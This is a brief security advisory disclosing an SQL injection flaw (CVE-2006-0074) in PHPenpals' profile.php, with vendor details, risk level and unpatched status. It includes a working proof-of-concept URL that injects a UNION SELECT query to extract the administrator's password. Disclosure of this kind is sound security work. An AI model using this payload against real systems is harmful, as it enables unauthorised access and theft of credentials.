SQL Injection Vulnerability in PHPenpals

Summary

Vulnerability
SQL Injection Vulnerability in PHPenpals
Discovered
2005.12.29
Last Update
0 n/a
ID
EV0005
CVE
CVE-2006-0074
Risk Level
medium
Type
SQL Injection
Status
Unpatched
Vendor
Jevontec (http://jevontech.com/)
Vulnerable Software
PHPenpals
Version
310704
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL Injection found in PHPenpals script.

Vulnerable scripts: profile.php

Variable $personalID isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

PoC/Exploit

Administrator's password:
http://host/phpenpals/profile.php? personalID=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,password,14%20from%20admin/*

Solution.

Solution for "SQL Injection Vulnerability in PHPenpals" is not available. Check Jevontec website for updates.